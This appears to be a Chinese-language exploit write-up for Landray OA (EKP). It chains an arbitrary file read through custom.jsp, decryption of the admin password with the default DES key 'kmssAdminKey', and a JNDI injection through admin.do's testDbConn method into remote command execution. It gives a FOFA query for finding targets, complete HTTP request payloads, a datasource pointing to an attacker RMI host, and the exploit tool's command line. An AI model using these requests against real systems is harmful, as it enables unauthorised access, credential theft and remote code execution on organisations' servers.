# 蓝凌OA SSRF+JNDI远程命令执行

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息，读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

蓝凌OA

### FOFA <a href="#fofa" id="fofa"></a>

app="Landray-OA系统"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

利用 **蓝凌OA custom.jsp 任意文件读取漏洞** 读取配置文件

```
/WEB-INF/KmssConfig/admin.properties
```

发送请求包

```
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhlw7RL3icMF5dl8N5_%2F-MhlzAg0gJoMBmdwSc1E%2Fimage.png?alt=media\&token=be8e5322-7e2c-4218-9c33-0d93fc697ed3)

&#x20;获取password后，使用 DES方法 解密，默认密钥为 **kmssAdminKey**

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhlw7RL3icMF5dl8N5_%2F-MhlzEkzDpI8B8g_kkJU%2Fimage.png?alt=media\&token=3c86a3ad-326d-41d9-bf49-19620e706eff)

访问后台地址使用解密的密码登录

```
http://xxx.xxx.xxx.xxx/admin.do
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhlw7RL3icMF5dl8N5_%2F-MhlzIsfGEgbvaUHAL5P%2Fimage.png?alt=media\&token=d89e2a7b-ba72-4567-87d3-ba0329b554ec)

使用工具执行命令

<https://github.com/welk1n/JNDI-Injection-Exploit>

```
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
```

运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)

```
POST /admin.do HTTP/1.1
Host: 
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967
Content-Length: 70
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin: 
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhlw7RL3icMF5dl8N5_%2F-MhlzQ64G4l5p18ZNFTJ%2Fimage.png?alt=media\&token=a185bd15-202a-4aa1-a5b7-94e7611f95cc)
